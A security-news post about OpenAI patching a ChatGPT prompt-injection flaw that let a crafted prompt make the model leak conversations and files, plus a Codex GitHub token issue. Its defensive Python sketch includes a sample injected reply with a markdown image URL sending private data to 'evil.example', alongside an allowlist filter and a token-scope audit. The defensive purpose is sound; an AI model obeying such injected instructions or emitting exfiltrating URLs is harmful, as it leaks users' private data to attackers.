OpenAI has rolled out an urgent fix for a newly discovered vulnerability that could let malicious actors siphon off private ChatGPT conversations and uploaded files without the user's knowledge. The flaw, identified by Check Point, shows how a single crafted prompt can turn an ordinary chat into a covert exfiltration channel. OpenAI also addressed a separate issue involving a misconfigured Codex GitHub token that could grant attackers access to sensitive code repositories.
- Exfiltration via Prompt – A specially crafted prompt can induce the model to transmit conversation data to an attacker-controlled endpoint, effectively turning the assistant itself into a data-leak channel (see the sketch after this list).
- Quick Patch Released – OpenAI’s security team deployed an update that blocks the trigger vector and sanitizes untrusted inputs before the model acts on them, closing the leak for active ChatGPT sessions.
- Codex Token Fix – The Codex GitHub token vulnerability has been corrected, preventing unauthorized API calls that could expose proprietary code.
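To make the exfiltration vector concrete, here is a minimal defensive sketch in Python. The advisory linked below does not publish proof-of-concept details, so the attack shape (an injected instruction that makes the model emit a markdown image whose URL smuggles data to a host like `evil.example`) and the mitigation (an allowlist filter applied to URLs in model output before the client renders them) are illustrative assumptions, not OpenAI’s actual fix; `ALLOWED_HOSTS` and `sanitize_model_output` are hypothetical names.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: only URLs on these hosts (or their subdomains)
# survive into rendered output; everything else is redacted so the client
# never issues a request that could carry exfiltrated data.
ALLOWED_HOSTS = {"openai.com", "githubusercontent.com"}

URL_RE = re.compile(r"https?://[^\s)\]]+")

def sanitize_model_output(text: str) -> str:
    """Redact any URL in model output whose host is not allowlisted."""
    def _filter(match: re.Match) -> str:
        host = urlparse(match.group(0)).hostname or ""
        if any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS):
            return match.group(0)
        return "[url removed]"

    return URL_RE.sub(_filter, text)

# A prompt-injected reply like the one below would otherwise make the
# chat client fetch the attacker's URL, leaking the query-string payload.
reply = "Summary done. ![status](https://evil.example/c?d=private-notes)"
print(sanitize_model_output(reply))
# -> Summary done. ![status]([url removed])
```

Filtering on the rendering side rather than the prompt side matters here: prompt sanitization can be bypassed by novel phrasings, while an egress allowlist caps what a successful injection can actually reach.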
These incidents underscore the importance of rigorous input validation and continuous security monitoring in AI platforms. While OpenAI’s rapid response mitigates the immediate risk, organizations that rely on ChatGPT or Codex should audit their deployment configurations, enforce strict token management (a minimal audit sketch follows), and watch for anomalous API activity. The broader lesson is clear: as AI systems grow more capable, the safeguards protecting the data they process must keep pace.
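On the token-management point, a lightweight audit is straightforward to script. The sketch below assumes a classic GitHub personal access token, which reports its granted scopes in the `X-OAuth-Scopes` response header; `EXPECTED_SCOPES` is a hypothetical policy, and nothing here reflects how the Codex token was actually scoped.

```python
import os
import requests

# Hypothetical policy: the scopes a CI/code-assistant integration is
# allowed to hold. Anything beyond these is flagged for rotation.
EXPECTED_SCOPES = {"repo:status", "public_repo"}

def audit_github_token(token: str) -> None:
    """Flag a classic GitHub token that holds broader scopes than policy allows."""
    resp = requests.get(
        "https://api.github.com/user",
        headers={"Authorization": f"Bearer {token}"},
        timeout=10,
    )
    resp.raise_for_status()
    # Classic tokens advertise their granted scopes in this response header.
    scopes_header = resp.headers.get("X-OAuth-Scopes", "")
    granted = {s.strip() for s in scopes_header.split(",") if s.strip()}
    excess = granted - EXPECTED_SCOPES
    if excess:
        print(f"WARNING: token holds excess scopes {sorted(excess)}; rotate and re-issue.")
    else:
        print("Token scopes match policy.")

audit_github_token(os.environ["GITHUB_TOKEN"])
```

Running a check like this on a schedule turns "strict token management" from a policy statement into something observable: an over-scoped or drifted token surfaces as a warning rather than waiting to be discovered in an incident.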
https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html